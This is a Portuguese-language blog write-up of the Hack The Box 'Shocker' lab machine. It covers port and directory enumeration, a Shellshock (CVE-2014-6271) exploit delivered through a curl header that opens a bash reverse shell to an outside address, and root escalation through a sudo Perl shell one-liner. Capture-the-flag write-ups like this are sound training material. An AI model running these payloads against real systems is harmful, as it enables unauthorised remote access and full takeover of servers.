Shocker - HTB Write Up - Shellsock Exploit - CVE-2014-6271


Shellsock Exploit - CVE-2014-6271


Enumeração Geral

nmap -Pn -sV -T4 -p- --open [IP]



HTTP Scan 

nmap -Pn -p 80 --script vuln [IP]


SSH Scan 

nmap -Pn -p 2222 --script vuln [IP]



O resultado do scan retorna o serviço EtherNetIP, no entanto, ao executar o acesso com Ncat para ver o Banner do serviço é possível confirmar se tratar do serviço OpenSSH 


Até o momento as informações coletadas do servidor-alvo são:

[+] Apache 2.4.18
[+] OpenSSH 7.2p2
[+] S.O Linux possivelmente Ubuntu

Ao executar enumeração de diretórios com o dirb, FFUF e GoBuster são localizados  /cgi-bin, index.html e server-status mas nenhum vetor é localizado. Ao pesquisar sobre o recon deste servidor, encontrei um artigo que indica para usar o GoBuster com a flag -f Essa flag adiciona para todas as requisições o slash /  De acordo com o artigo, isso é necessário pois a aplicação retorna Not Found - 404 quando o acesso é feito /cgi-bin e retorna Forbidden - 403 quando o acesso é feito /cgi-bin/ indicando que a aplicação "aceita" somente buscas por diretórios. 


Enumeração do diretório /cgi-bin/ procurando as extensões sh e cgi 

gobuster dir -e -w directory-list-2.3-medium.txt -u 10.129.3.255/cgi-bin/ -x sh, cgi

O resultado desse scan é positivo e retorna o arquivo user.sh que automaticamente faz o download quando é acessado, mesmo retornando o status 403 - Forbidden



Conteúdo do script 


Confirmando a vulnerabilidade Shellshock com NMAP 

nmap [IP] -p 80 --script=http-shellshock --script-args uri=/cgi-bin/user.sh 


Exploit Shellshock EASY

O conteúdo do script dá uma dica sobre o tipo de parâmetro que deve ser usado na requisição /cgi-bin/user.sh

No artigo do Hack Tricks é mostrado como executar uma shell-reversa usando cURL e o parâmetro do cabeçalho HTTP. Seguindo essa lógica, ao executar o comando abaixo a conexão reversa é estabelecida, dando acesso ao servidor Shocker. 

curl -H 'Content-Type: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.48/80 0>&1' http://10.129.3.255/cgi-bin/user.sh


Shell Reversa 


Escalação de Privilégio 

O usuário Shelly pertence ao grupo LXD mas a exploração não funcionou. Ao verificar as permissões de SUDO do usuário, foi possível identificar que o usuário tem permissão para executar scripts e comandos Perl. Logo é possível executar o comando abaixo e obter uma shell com privilégio elevado (root). 

sudo perl -e 'exec "/bin/sh";'




No GTFOBINS é possível obter o comando para executar a escalação de privilégio. 



Attck Complete !!



Comentários

Postar um comentário

Postagens mais visitadas